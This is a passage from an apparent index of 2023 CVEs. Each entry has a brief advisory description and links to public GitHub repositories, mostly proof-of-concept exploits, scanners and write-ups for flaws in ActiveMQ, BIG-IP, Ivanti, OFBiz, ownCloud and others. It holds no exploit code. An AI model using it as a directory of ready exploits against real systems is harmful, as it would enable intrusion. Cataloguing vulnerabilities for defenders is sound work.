[sajaljat/CVE-2023-46449](https://github.com/sajaljat/CVE-2023-46449) + +### CVE-2023-46450 (2023-10-26) + +Sourcecodester Free and Open Source inventory management system 1.0 is vulnerable to Cross Site Scripting (XSS) via the Add supplier function. + + +- [yte121/-CVE-2023-46450](https://github.com/yte121/-CVE-2023-46450) + +### CVE-2023-46451 (2023-10-31) + +Best Courier Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in the change username field. + + +- [sajaljat/CVE-2023-46451](https://github.com/sajaljat/CVE-2023-46451) + +### CVE-2023-46454 (2023-12-12) + +In GL.iNET GL-AR300M routers with firmware v4.3.7, it is possible to inject arbitrary shell commands through a crafted package name in the package information functionality. + + +- [cyberaz0r/GL.iNet-Multiple-Vulnerabilities](https://github.com/cyberaz0r/GL.iNet-Multiple-Vulnerabilities) + +### CVE-2023-46474 (2024-01-11) + +File Upload vulnerability PMB v.7.4.8 allows a remote attacker to execute arbitrary code and escalate privileges via a crafted PHP file uploaded to the start_import.php file. + + +- [Xn2/CVE-2023-46474](https://github.com/Xn2/CVE-2023-46474) + +### CVE-2023-46478 (2023-10-30) + +An issue in minCal v.1.0.0 allows a remote attacker to execute arbitrary code via a crafted script to the customer_data parameter. + + +- [mr-xmen786/CVE-2023-46478](https://github.com/mr-xmen786/CVE-2023-46478) + +### CVE-2023-46501 (2023-11-07) + +An issue in BoltWire v.6.03 allows a remote attacker to obtain sensitive information via a crafted payload to the view and change admin password function. + + +- [Cyber-Wo0dy/CVE-2023-46501](https://github.com/Cyber-Wo0dy/CVE-2023-46501) + +### CVE-2023-46604 (2023-10-27) + +The Java OpenWire protocol marshaller is vulnerable to Remote Code \nExecution. This vulnerability may allow a remote attacker with network \naccess to either a Java-based OpenWire broker or client to run arbitrary\n shell commands by manipulating serialized class types in the OpenWire \nprotocol to cause either the client or the broker (respectively) to \ninstantiate any class on the classpath.\n\nUsers are recommended to upgrade\n both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 \nwhich fixes this issue.\n\n + + +- [trganda/ActiveMQ-RCE](https://github.com/trganda/ActiveMQ-RCE) +- [X1r0z/ActiveMQ-RCE](https://github.com/X1r0z/ActiveMQ-RCE) +- [JaneMandy/ActiveMQ_RCE_Pro_Max](https://github.com/JaneMandy/ActiveMQ_RCE_Pro_Max) +- [SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ](https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ) +- [evkl1d/CVE-2023-46604](https://github.com/evkl1d/CVE-2023-46604) +- [sule01u/CVE-2023-46604](https://github.com/sule01u/CVE-2023-46604) +- [justdoit-cai/CVE-2023-46604-Apache-ActiveMQ-RCE-exp](https://github.com/justdoit-cai/CVE-2023-46604-Apache-ActiveMQ-RCE-exp) +- [h3x3h0g/ActiveMQ-RCE-CVE-2023-46604-Write-up](https://github.com/h3x3h0g/ActiveMQ-RCE-CVE-2023-46604-Write-up) +- [duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell](https://github.com/duck-sec/CVE-2023-46604-ActiveMQ-RCE-pseudoshell) +- [vjayant93/CVE-2023-46604-POC](https://github.com/vjayant93/CVE-2023-46604-POC) +- [LiritoShawshark/CVE-2023-46604_ActiveMQ_RCE_Recurrence](https://github.com/LiritoShawshark/CVE-2023-46604_ActiveMQ_RCE_Recurrence) +- [NKeshawarz/CVE-2023-46604-RCE](https://github.com/NKeshawarz/CVE-2023-46604-RCE) +- [minhangxiaohui/ActiveMQ_CVE-2023-46604](https://github.com/minhangxiaohui/ActiveMQ_CVE-2023-46604) +- [nitzanoligo/CVE-2023-46604-demo](https://github.com/nitzanoligo/CVE-2023-46604-demo) +- [tomasmussi-mulesoft/activemq-cve-2023-46604](https://github.com/tomasmussi-mulesoft/activemq-cve-2023-46604) +- [dcm2406/CVE-Lab](https://github.com/dcm2406/CVE-Lab) +- [mrpentst/CVE-2023-46604](https://github.com/mrpentst/CVE-2023-46604) +- [dcm2406/CVE-2023-46604](https://github.com/dcm2406/CVE-2023-46604) +- [Mudoleto/Broker_ApacheMQ](https://github.com/Mudoleto/Broker_ApacheMQ) +- [hh-hunter/cve-2023-46604](https://github.com/hh-hunter/cve-2023-46604) +- [stegano5/ExploitScript-CVE-2023-46604](https://github.com/stegano5/ExploitScript-CVE-2023-46604) +- [Arlenhiack/ActiveMQ-RCE-Exploit](https://github.com/Arlenhiack/ActiveMQ-RCE-Exploit) +- [vulncheck-oss/cve-2023-46604](https://github.com/vulncheck-oss/cve-2023-46604) +- [thinkycx/activemq-rce-cve-2023-46604](https://github.com/thinkycx/activemq-rce-cve-2023-46604) +- [mranv/honeypot.rs](https://github.com/mranv/honeypot.rs) +- [pulentoski/CVE-2023-46604](https://github.com/pulentoski/CVE-2023-46604) +- [cuanh2333/CVE-2023-46604](https://github.com/cuanh2333/CVE-2023-46604) + +### CVE-2023-46615 (2024-02-12) + +Deserialization of Untrusted Data vulnerability in Kalli Dan. KD Coming Soon.This issue affects KD Coming Soon: from n/a through 1.7.\n\n + + +- [RandomRobbieBF/CVE-2023-46615](https://github.com/RandomRobbieBF/CVE-2023-46615) + +### CVE-2023-46694 (-) + +Vtenext 21.02 allows an authenticated attacker to upload arbitrary files, potentially enabling them to execute remote commands. This flaw exists due to the application's failure to enforce proper authentication controls when accessing the Ckeditor file manager functionality. + + +- [invisiblebyte/CVE-2023-46694](https://github.com/invisiblebyte/CVE-2023-46694) + +### CVE-2023-46747 (2023-10-26) + +\n\n\nUndisclosed requests may bypass configuration utility authentication, allowing an attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands.  Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated\n\n + + +- [bijaysenihang/CVE-2023-46747-Mass-RCE](https://github.com/bijaysenihang/CVE-2023-46747-Mass-RCE) +- [W01fh4cker/CVE-2023-46747-RCE](https://github.com/W01fh4cker/CVE-2023-46747-RCE) +- [fu2x2000/CVE-2023-46747](https://github.com/fu2x2000/CVE-2023-46747) +- [maniak-academy/Mitigate-CVE-2023-46747](https://github.com/maniak-academy/Mitigate-CVE-2023-46747) +- [y4v4z/CVE-2023-46747-POC](https://github.com/y4v4z/CVE-2023-46747-POC) +- [nvansluis/test_cve-2023-46747](https://github.com/nvansluis/test_cve-2023-46747) +- [RevoltSecurities/CVE-2023-46747](https://github.com/RevoltSecurities/CVE-2023-46747) +- [vidura2/cve-2023-46747](https://github.com/vidura2/cve-2023-46747) +- [rainbowhatrkn/CVE-2023-46747-RCE](https://github.com/rainbowhatrkn/CVE-2023-46747-RCE) + +### CVE-2023-46805 (2024-01-12) + +An authentication bypass vulnerability in the web component of Ivanti ICS 9.x, 22.x and Ivanti Policy Secure allows a remote attacker to access restricted resources by bypassing control checks. + + +- [yoryio/CVE-2023-46805](https://github.com/yoryio/CVE-2023-46805) +- [cbeek-r7/CVE-2023-46805](https://github.com/cbeek-r7/CVE-2023-46805) +- [duy-31/CVE-2023-46805_CVE-2024-21887](https://github.com/duy-31/CVE-2023-46805_CVE-2024-21887) +- [raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887](https://github.com/raminkarimkhani1996/CVE-2023-46805_CVE-2024-21887) +- [seajaysec/Ivanti-Connect-Around-Scan](https://github.com/seajaysec/Ivanti-Connect-Around-Scan) +- [Chocapikk/CVE-2023-46805](https://github.com/Chocapikk/CVE-2023-46805) +- [mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped](https://github.com/mickdec/CVE-2023-46805_CVE-2024-21887_scan_grouped) +- [w2xim3/CVE-2023-46805](https://github.com/w2xim3/CVE-2023-46805) + +### CVE-2023-46813 (2023-10-27) + +An issue was discovered in the Linux kernel before 6.5.9, exploitable by local users with userspace access to MMIO registers. Incorrect access checking in the #VC handler and instruction emulation of the SEV-ES emulation of MMIO accesses could lead to arbitrary write access to kernel memory (and thus privilege escalation). This depends on a race condition through which userspace can replace an instruction before the #VC handler reads it. + + +- [Freax13/cve-2023-46813-poc](https://github.com/Freax13/cve-2023-46813-poc) + +### CVE-2023-46818 (2023-10-27) + +An issue was discovered in ISPConfig before 3.2.11p1. PHP code injection can be achieved in the language file editor by an admin if admin_allow_langedit is enabled. + + +- [bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit) + +### CVE-2023-46865 (2023-10-30) + +/api/v1/company/upload-logo in CompanyController.php in crater through 6.0.6 allows a superadmin to execute arbitrary PHP code by placing this code into an image/png IDAT chunk of a Company Logo image. + + +- [asylumdx/Crater-CVE-2023-46865-RCE](https://github.com/asylumdx/Crater-CVE-2023-46865-RCE) + +### CVE-2023-46870 (-) + +extcap/nrf_sniffer_ble.py, extcap/nrf_sniffer_ble.sh, extcap/SnifferAPI/*.py in Nordic Semiconductor nRF Sniffer for Bluetooth LE 3.0.0, 3.1.0, 4.0.0, 4.1.0, and 4.1.1 have set incorrect file permission, which allows attackers to do code execution via modified bash and python scripts. + + +- [Chapoly1305/CVE-2023-46870](https://github.com/Chapoly1305/CVE-2023-46870) + +### CVE-2023-46948 (2024-09-23) + +A reflected Cross-Site Scripting (XSS) vulnerability was found on Temenos T24 Browser R19.40 that enables a remote attacker to execute arbitrary JavaScript code via the skin parameter in the about.jsp and genrequest.jsp components. + + +- [AzraelsBlade/CVE-2023-46948](https://github.com/AzraelsBlade/CVE-2023-46948) + +### CVE-2023-46954 (2023-11-03) + +SQL Injection vulnerability in Relativity ODA LLC RelativityOne v.12.1.537.3 Patch 2 and earlier allows a remote attacker to execute arbitrary code via the name parameter. + + +- [jakedmurphy1/CVE-2023-46954](https://github.com/jakedmurphy1/CVE-2023-46954) + +### CVE-2023-46974 (2023-12-07) + +Cross Site Scripting vulnerability in Best Courier Management System v.1.000 allows a remote attacker to execute arbitrary code via a crafted payload to the page parameter in the URL. + + +- [yte121/CVE-2023-46974](https://github.com/yte121/CVE-2023-46974) + +### CVE-2023-46980 (2023-11-03) + +An issue in Best Courier Management System v.1.0 allows a remote attacker to execute arbitrary code and escalate privileges via a crafted script to the userID parameter. + + +- [sajaljat/CVE-2023-46980](https://github.com/sajaljat/CVE-2023-46980) + +### CVE-2023-46998 (2023-11-07) + +Cross Site Scripting vulnerability in BootBox Bootbox.js v.3.2 through 6.0 allows a remote attacker to execute arbitrary code via a crafted payload to alert(), confirm(), prompt() functions. + + +- [soy-oreocato/CVE-2023-46998](https://github.com/soy-oreocato/CVE-2023-46998) + +### CVE-2023-47014 (2023-11-22) + +A Cross-Site Request Forgery (CSRF) vulnerability in Sourcecodester Sticky Notes App Using PHP with Source Code v.1.0 allows a local attacker to obtain sensitive information via a crafted payload to add-note.php. + + +- [emirhanerdogu/CVE-2023-47014-Sticky-Notes-App-Using-PHP-with-Source-Code-v1.0-CSRF-to-CORS](https://github.com/emirhanerdogu/CVE-2023-47014-Sticky-Notes-App-Using-PHP-with-Source-Code-v1.0-CSRF-to-CORS) + +### CVE-2023-47102 (2023-11-07) + +UrBackup Server 2.5.31 allows brute-force enumeration of user accounts because a failure message confirms that a username is not valid. + + +- [nitipoom-jar/CVE-2023-47102](https://github.com/nitipoom-jar/CVE-2023-47102) + +### CVE-2023-47108 (2023-11-10) + +OpenTelemetry-Go Contrib is a collection of third-party packages for OpenTelemetry-Go. Prior to version 0.46.0, the grpc Unary Server Interceptor out of the box adds labels `net.peer.sock.addr` and `net.peer.sock.port` that have unbound cardinality. It leads to the server's potential memory exhaustion when many malicious requests are sent. An attacker can easily flood the peer address and port for requests. Version 0.46.0 contains a fix for this issue. As a workaround to stop being affected, a view removing the attributes can be used. The other possibility is to disable grpc metrics instrumentation by passing `otelgrpc.WithMeterProvider` option with `noop.NewMeterProvider`. + + +- [bahe-msft/govuln-CVE-2023-47108](https://github.com/bahe-msft/govuln-CVE-2023-47108) + +### CVE-2023-47119 (2023-11-10) + +Discourse is an open source platform for community discussion. Prior to version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches, some links can inject arbitrary HTML tags when rendered through our Onebox engine. The issue is patched in version 3.1.3 of the `stable` branch and version 3.2.0.beta3 of the `beta` and `tests-passed` branches. There are no known workarounds. + + +- [BaadMaro/CVE-2023-47119](https://github.com/BaadMaro/CVE-2023-47119) +- [Cristiano100/CVE-2023-47119](https://github.com/Cristiano100/CVE-2023-47119) + +### CVE-2023-47129 (2023-11-10) + +Statmic is a core Laravel content management system Composer package. Prior to versions 3.4.13 and 4.33.0, on front-end forms with an asset upload field, PHP files crafted to look like images may be uploaded. This only affects forms using the "Forms" feature and not just _any_ arbitrary form. This does not affect the control panel. This issue has been patched in 3.4.13 and 4.33.0.\n + + +- [Cyber-Wo0dy/CVE-2023-47129](https://github.com/Cyber-Wo0dy/CVE-2023-47129) + +### CVE-2023-47179 +- [RandomRobbieBF/CVE-2023-47179](https://github.com/RandomRobbieBF/CVE-2023-47179) + +### CVE-2023-47218 (2024-02-13) + +An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.5.2645 build 20240116 and later\nQuTS hero h5.1.5.2647 build 20240118 and later\nQuTScloud c5.1.5.2651 and later\n + + +- [passwa11/CVE-2023-47218](https://github.com/passwa11/CVE-2023-47218) + +### CVE-2023-47246 (2023-11-10) + +In SysAid On-Premise before 23.3.36, a path traversal vulnerability leads to code execution after an attacker writes a file to the Tomcat webroot, as exploited in the wild in November 2023. + + +- [W01fh4cker/CVE-2023-47246-EXP](https://github.com/W01fh4cker/CVE-2023-47246-EXP) +- [rainbowhatrkn/CVE-2023-47246](https://github.com/rainbowhatrkn/CVE-2023-47246) +- [tucommenceapousser/CVE-2023-47246](https://github.com/tucommenceapousser/CVE-2023-47246) +- [XiaomingX/cve-2023-47246-poc](https://github.com/XiaomingX/cve-2023-47246-poc) + +### CVE-2023-47253 (2023-11-06) + +Qualitor through 8.20 allows remote attackers to execute arbitrary code via PHP code in the html/ad/adpesquisasql/request/processVariavel.php gridValoresPopHidden parameter. + + +- [OpenXP-Research/CVE-2023-47253](https://github.com/OpenXP-Research/CVE-2023-47253) +- [gmh5225/CVE-2023-47253](https://github.com/gmh5225/CVE-2023-47253) + +### CVE-2023-47355 (2024-02-05) + +The com.eypcnnapps.quickreboot (aka Eyuep Can Yilmaz {ROOT] Quick Reboot) application 1.0.8 for Android has exposed broadcast receivers for PowerOff, Reboot, and Recovery (e.g., com.eypcnnapps.quickreboot.widget.PowerOff) that are susceptible to unauthorized broadcasts because of missing input validation. + + +- [actuator/com.eypcnnapps.quickreboot](https://github.com/actuator/com.eypcnnapps.quickreboot) + +### CVE-2023-47400 +- [LucasVanHaaren/CVE-2023-47400](https://github.com/LucasVanHaaren/CVE-2023-47400) + +### CVE-2023-47437 (2023-11-27) + +A vulnerability has been identified in Pachno 1.0.6 allowing an authenticated attacker to execute a cross-site scripting (XSS) attack. The vulnerability exists due to inadequate input validation in the Project Description and comments, which enables an attacker to inject malicious java script. + + +- [herombey/CVE-2023-47437](https://github.com/herombey/CVE-2023-47437) + +### CVE-2023-47459 (2024-01-16) + +An issue in Knovos Discovery v.22.67.0 allows a remote attacker to obtain sensitive information via the /DiscoveryReview/Service/CaseManagement.svc/GetProductSiteName component. + + +- [aleksey-vi/CVE-2023-47459](https://github.com/aleksey-vi/CVE-2023-47459) + +### CVE-2023-47460 (2024-01-16) + +SQL injection vulnerability in Knovos Discovery v.22.67.0 allows a remote attacker to execute arbitrary code via the /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure component. + + +- [aleksey-vi/CVE-2023-47460](https://github.com/aleksey-vi/CVE-2023-47460) + +### CVE-2023-47464 (2023-11-30) + +Insecure Permissions vulnerability in GL.iNet AX1800 version 4.0.0 before 4.5.0 allows a remote attacker to execute arbitrary code via the upload API function. + + +- [HadessCS/CVE-2023-47464](https://github.com/HadessCS/CVE-2023-47464) + +### CVE-2023-47488 (2023-11-09) + +Cross Site Scripting vulnerability in Combodo iTop v.3.1.0-2-11973 allows a local attacker to obtain sensitive information via a crafted script to the attrib_manager_id parameter in the General Information page and the id parameter in the contact page. + + +- [nitipoom-jar/CVE-2023-47488](https://github.com/nitipoom-jar/CVE-2023-47488) + +### CVE-2023-47489 (2023-11-09) + +CSV injection in export as csv in Combodo iTop v.3.1.0-2-11973 allows a local attacker to execute arbitrary code via a crafted script to the export-v2.php and ajax.render.php components. + + +- [nitipoom-jar/CVE-2023-47489](https://github.com/nitipoom-jar/CVE-2023-47489) + +### CVE-2023-47504 (2024-04-24) + +Improper Authentication vulnerability in Elementor Elementor Website Builder allows Accessing Functionality Not Properly Constrained by ACLs.This issue affects Elementor Website Builder: from n/a through 3.16.4.\n\n + + +- [davidxbors/CVE-2023-47504-POC](https://github.com/davidxbors/CVE-2023-47504-POC) + +### CVE-2023-47529 (2023-11-23) + +Exposure of Sensitive Information to an Unauthorized Actor vulnerability in ThemeIsle Cloud Templates & Patterns collection.This issue affects Cloud Templates & Patterns collection: from n/a through 1.2.2.\n\n + + +- [RandomRobbieBF/CVE-2023-47529](https://github.com/RandomRobbieBF/CVE-2023-47529) + +### CVE-2023-47564 (2024-02-02) + +An incorrect permission assignment for critical resource vulnerability has been reported to affect Qsync Central. If exploited, the vulnerability could allow authenticated users to read or modify the resource via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQsync Central 4.4.0.15 ( 2024/01/04 ) and later\nQsync Central 4.3.0.11 ( 2024/01/11 ) and later\n + + +- [C411e/CVE-2023-47564](https://github.com/C411e/CVE-2023-47564) + +### CVE-2023-47668 (2023-11-23) + +Exposure of Sensitive Information to an Unauthorized Actor vulnerability in StellarWP Membership Plugin – Restrict Content plugin <= 3.2.7 versions. + + +- [RandomRobbieBF/CVE-2023-47668](https://github.com/RandomRobbieBF/CVE-2023-47668) + +### CVE-2023-47840 (2023-12-29) + +Improper Control of Generation of Code ('Code Injection') vulnerability in Qode Interactive Qode Essential Addons.This issue affects Qode Essential Addons: from n/a through 1.5.2.\n\n + + +- [RandomRobbieBF/CVE-2023-47840](https://github.com/RandomRobbieBF/CVE-2023-47840) + +### CVE-2023-47882 (2023-12-27) + +The Kami Vision YI IoT com.yunyi.smartcamera application through 4.1.9_20231127 for Android allows a remote attacker to execute arbitrary JavaScript code via an implicit intent to the com.ants360.yicamera.activity.WebViewActivity component. + + +- [actuator/yi](https://github.com/actuator/yi) + +### CVE-2023-47883 (2023-12-27) + +The com.altamirano.fabricio.tvbrowser TV browser application through 4.5.1 for Android is vulnerable to JavaScript code execution via an explicit intent due to an exposed MainActivity. + + +- [actuator/com.altamirano.fabricio.tvbrowser](https://github.com/actuator/com.altamirano.fabricio.tvbrowser) + +### CVE-2023-47889 (2024-02-06) + +The Android application BINHDRM26 com.bdrm.superreboot 1.0.3, exposes several critical actions through its exported broadcast receivers. These exposed actions can allow any app on the device to send unauthorized broadcasts, leading to unintended consequences. The vulnerability is particularly concerning because these actions include powering off, system reboot & entering recovery mode. + + +- [actuator/com.bdrm.superreboot](https://github.com/actuator/com.bdrm.superreboot) + +### CVE-2023-48022 (2023-11-28) + +Anyscale Ray 2.6.3 and 2.8.0 allows a remote attacker to execute arbitrary code via the job submission API. NOTE: the vendor's position is that this report is irrelevant because Ray, as stated in its documentation, is not intended for use outside of a strictly controlled network environment + + +- [0x656565/CVE-2023-48022](https://github.com/0x656565/CVE-2023-48022) +- [jakabakos/ShadowRay-RCE-PoC-CVE-2023-48022](https://github.com/jakabakos/ShadowRay-RCE-PoC-CVE-2023-48022) + +### CVE-2023-48028 (2023-11-17) + +kodbox 1.46.01 has a security flaw that enables user enumeration. This problem is present on the login page, where an attacker can identify valid users based on varying response messages, potentially paving the way for a brute force attack. + + +- [nitipoom-jar/CVE-2023-48028](https://github.com/nitipoom-jar/CVE-2023-48028) + +### CVE-2023-48029 (2023-11-17) + +Corebos 8.0 and below is vulnerable to CSV Injection. An attacker with low privileges can inject a malicious command into a table. This vulnerability is exploited when an administrator visits the user management section, exports the data to a CSV file, and then opens it, leading to the execution of the malicious payload on the administrator's computer. + + +- [nitipoom-jar/CVE-2023-48029](https://github.com/nitipoom-jar/CVE-2023-48029) + +### CVE-2023-48031 (2023-11-17) + +OpenSupports v4.11.0 is vulnerable to Unrestricted Upload of File with Dangerous Type. In the comment function, an attacker can bypass security restrictions and upload a .bat file by manipulating the file's magic bytes to masquerade as an allowed type. This can enable the attacker to execute arbitrary code or establish a reverse shell, leading to unauthorized file writes or control over the victim's station via a crafted file upload operation. + + +- [nitipoom-jar/CVE-2023-48031](https://github.com/nitipoom-jar/CVE-2023-48031) + +### CVE-2023-48034 (2023-11-27) + +An issue discovered in Acer Wireless Keyboard SK-9662 allows attacker in physical proximity to both decrypt wireless keystrokes and inject arbitrary keystrokes via use of weak encryption. + + +- [aprkr/CVE-2023-48034](https://github.com/aprkr/CVE-2023-48034) + +### CVE-2023-48084 (2023-12-14) + +Nagios XI before version 5.11.3 was discovered to contain a SQL injection vulnerability via the bulk modification tool. + + +- [Hamibubu/CVE-2023-48084](https://github.com/Hamibubu/CVE-2023-48084) +- [bucketcat/CVE-2023-48084](https://github.com/bucketcat/CVE-2023-48084) + +### CVE-2023-48104 (2024-01-16) + +Alinto SOGo before 5.9.1 is vulnerable to HTML Injection. + + +- [E1tex/CVE-2023-48104](https://github.com/E1tex/CVE-2023-48104) + +### CVE-2023-48123 (2023-12-06) + +An issue in Netgate pfSense Plus v.23.05.1 and before and pfSense CE v.2.7.0 allows a remote attacker to execute arbitrary code via a crafted request to the packet_capture.php file. + + +- [NHPT/CVE-2023-48123](https://github.com/NHPT/CVE-2023-48123) +- [Farzan-Kh/CVE-2023-48123](https://github.com/Farzan-Kh/CVE-2023-48123) + +### CVE-2023-48194 (2024-07-09) + +Vulnerability in Tenda AC8v4 .V16.03.34.09 due to sscanf and the last digit of s8 being overwritten with \x0. After executing set_client_qos, control over the gp register can be obtained. + + +- [zt20xx/CVE-2023-48194](https://github.com/zt20xx/CVE-2023-48194) + +### CVE-2023-48197 (2023-11-15) + +Cross-Site Scripting (XSS) vulnerability in the ‘manageApiKeys’ component of Grocy 4.0.3 and earlier allows attackers to obtain victim's cookies when the victim clicks on the "see QR code" function. + + +- [nitipoom-jar/CVE-2023-48197](https://github.com/nitipoom-jar/CVE-2023-48197) + +### CVE-2023-48198 (2023-11-15) + +A Cross-Site Scripting (XSS) vulnerability in the 'product description' component within '/api/stock/products' of Grocy version <= 4.0.3 allows attackers to obtain a victim's cookies. + + +- [nitipoom-jar/CVE-2023-48198](https://github.com/nitipoom-jar/CVE-2023-48198) + +### CVE-2023-48199 (2023-11-15) + +HTML Injection vulnerability in the 'manageApiKeys' component in Grocy <= 4.0.3 allows attackers to inject arbitrary HTML content without script execution. This occurs when user-supplied data is not appropriately sanitized, enabling the injection of HTML tags through parameter values. The attacker can then manipulate page content in the QR code detail popup, often coupled with social engineering tactics, exploiting both the trust of users and the application's lack of proper input handling. + + +- [nitipoom-jar/CVE-2023-48199](https://github.com/nitipoom-jar/CVE-2023-48199) + +### CVE-2023-48200 (2023-11-15) + +Cross Site Scripting vulnerability in Grocy v.4.0.3 allows a local attacker to execute arbitrary code and obtain sensitive information via the equipment description component within /equipment/ component. + + +- [nitipoom-jar/CVE-2023-48200](https://github.com/nitipoom-jar/CVE-2023-48200) + +### CVE-2023-48777 (2024-03-26) + +Unrestricted Upload of File with Dangerous Type vulnerability in Elementor.Com Elementor Website Builder.This issue affects Elementor Website Builder: from 3.3.0 through 3.18.1.\n\n + + +- [AkuCyberSec/Elementor-3.18.0-Upload-Path-Traversal-RCE-CVE-2023-48777](https://github.com/AkuCyberSec/Elementor-3.18.0-Upload-Path-Traversal-RCE-CVE-2023-48777) + +### CVE-2023-48788 (2024-03-12) + +A improper neutralization of special elements used in an sql command ('sql injection') in Fortinet FortiClientEMS version 7.2.0 through 7.2.2, FortiClientEMS 7.0.1 through 7.0.10 allows attacker to execute unauthorized code or commands via specially crafted packets. + + +- [horizon3ai/CVE-2023-48788](https://github.com/horizon3ai/CVE-2023-48788) + +### CVE-2023-48842 (2023-12-01) + +D-Link Go-RT-AC750 revA_v101b03 was discovered to contain a command injection vulnerability via the service parameter at hedwig.cgi. + + +- [creacitysec/CVE-2023-48842](https://github.com/creacitysec/CVE-2023-48842) + +### CVE-2023-48849 (2023-12-06) + +Ruijie EG Series Routers version EG_3.0(1)B11P216 and before allows unauthenticated attackers to remotely execute arbitrary code due to incorrect filtering. + + +- [delsploit/CVE-2023-48849](https://github.com/delsploit/CVE-2023-48849) + +### CVE-2023-48858 (2024-01-17) + +A Cross-site scripting (XSS) vulnerability in login page php code in Armex ABO.CMS 5.9 allows remote attackers to inject arbitrary web script or HTML via the login.php? URL part. + + +- [Shumerez/CVE-2023-48858](https://github.com/Shumerez/CVE-2023-48858) + +### CVE-2023-48866 (2023-12-04) + +A Cross-Site Scripting (XSS) vulnerability in the recipe preparation component within /api/objects/recipes and note component within /api/objects/shopping_lists/ of Grocy <= 4.0.3 allows attackers to obtain the victim's cookies. + + +- [nitipoom-jar/CVE-2023-48866](https://github.com/nitipoom-jar/CVE-2023-48866) + +### CVE-2023-48974 (2024-02-08) + +Cross Site Scripting vulnerability in Axigen WebMail prior to 10.3.3.61 allows a remote attacker to escalate privileges via a crafted script to the serverName_input parameter. + + +- [vinnie1717/CVE-2023-48974](https://github.com/vinnie1717/CVE-2023-48974) + +### CVE-2023-48981 +- [tristao-marinho/CVE-2023-48981](https://github.com/tristao-marinho/CVE-2023-48981) + +### CVE-2023-48982 +- [tristao-marinho/CVE-2023-48982](https://github.com/tristao-marinho/CVE-2023-48982) + +### CVE-2023-48983 +- [tristao-marinho/CVE-2023-48983](https://github.com/tristao-marinho/CVE-2023-48983) + +### CVE-2023-49002 (2023-12-27) + +An issue in Xenom Technologies (sinous) Phone Dialer-voice Call Dialer v.1.2.5 allows an attacker to bypass intended access restrictions via interaction with com.funprime.calldialer.ui.activities.OutgoingActivity. + + +- [actuator/com.sinous.voice.dialer](https://github.com/actuator/com.sinous.voice.dialer) + +### CVE-2023-49003 (2023-12-27) + +An issue in simplemobiletools Simple Dialer 5.18.1 allows an attacker to bypass intended access restrictions via interaction with com.simplemobiletools.dialer.activities.DialerActivity. + + +- [actuator/com.simplemobiletools.dialer](https://github.com/actuator/com.simplemobiletools.dialer) + +### CVE-2023-49038 (2024-01-29) + +Command injection in the ping utility on Buffalo LS210D 1.78-0.03 allows a remote authenticated attacker to inject arbitrary commands onto the NAS as root. + + +- [christopher-pace/CVE-2023-49038](https://github.com/christopher-pace/CVE-2023-49038) + +### CVE-2023-49052 (2023-11-30) + +File Upload vulnerability in Microweber v.2.0.4 allows a remote attacker to execute arbitrary code via a crafted script to the file upload function in the created forms component. + + +- [Cyber-Wo0dy/CVE-2023-49052](https://github.com/Cyber-Wo0dy/CVE-2023-49052) + +### CVE-2023-49070 (2023-12-05) + +\nPre-auth RCE in Apache Ofbiz 18.12.09.\n\nIt's due to XML-RPC no longer maintained still present.\nThis issue affects Apache OFBiz: before 18.12.10. \nUsers are recommended to upgrade to version 18.12.10\n\n + + +- [abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC](https://github.com/abdoghazy2015/ofbiz-CVE-2023-49070-RCE-POC) +- [0xrobiul/CVE-2023-49070](https://github.com/0xrobiul/CVE-2023-49070) +- [D0g3-8Bit/OFBiz-Attack](https://github.com/D0g3-8Bit/OFBiz-Attack) +- [UserConnecting/Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz](https://github.com/UserConnecting/Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz) +- [yukselberkay/CVE-2023-49070_CVE-2023-51467](https://github.com/yukselberkay/CVE-2023-49070_CVE-2023-51467) +- [Praison001/Apache-OFBiz-Auth-Bypass-and-RCE-Exploit-CVE-2023-49070-CVE-2023-51467](https://github.com/Praison001/Apache-OFBiz-Auth-Bypass-and-RCE-Exploit-CVE-2023-49070-CVE-2023-51467) + +### CVE-2023-49103 (2023-11-21) + +An issue was discovered in ownCloud owncloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1. The graphapi app relies on a third-party GetPhpInfo.php library that provides a URL. When this URL is accessed, it reveals the configuration details of the PHP environment (phpinfo). This information includes all the environment variables of the webserver. In containerized deployments, these environment variables may include sensitive data such as the ownCloud admin password, mail server credentials, and license key. Simply disabling the graphapi app does not eliminate the vulnerability. Additionally, phpinfo exposes various other potentially sensitive configuration details that could be exploited by an attacker to gather information about the system. Therefore, even if ownCloud is not running in a containerized environment, this vulnerability should still be a cause for concern. Note that Docker containers from before February 2023 are not vulnerable to the credential disclosure. + + +- [creacitysec/CVE-2023-49103](https://github.com/creacitysec/CVE-2023-49103) +- [merlin-ke/OwnCloud-CVE-2023-49103](https://github.com/merlin-ke/OwnCloud-CVE-2023-49103) +- [d0rb/CVE-2023-49103](https://github.com/d0rb/CVE-2023-49103) + +### CVE-2023-49105 (2023-11-21) + +An issue was discovered in ownCloud owncloud/core before 10.13.1. An attacker can access, modify, or delete any file without authentication if the username of a victim is known, and the victim has no signing-key configured. This occurs because pre-signed URLs can be accepted even when no signing-key is configured for the owner of the files. The earliest affected version is 10.6.0. + + +- [ambionics/owncloud-exploits](https://github.com/ambionics/owncloud-exploits) + +### CVE-2023-49313 (2023-11-28) + +A dylib injection vulnerability in XMachOViewer 0.04 allows attackers to compromise integrity. By exploiting this, unauthorized code can be injected into the product's processes, potentially leading to remote control and unauthorized access to sensitive user data. + + +- [louiselalanne/CVE-2023-49313](https://github.com/louiselalanne/CVE-2023-49313) + +### CVE-2023-49314 (2023-11-28) + 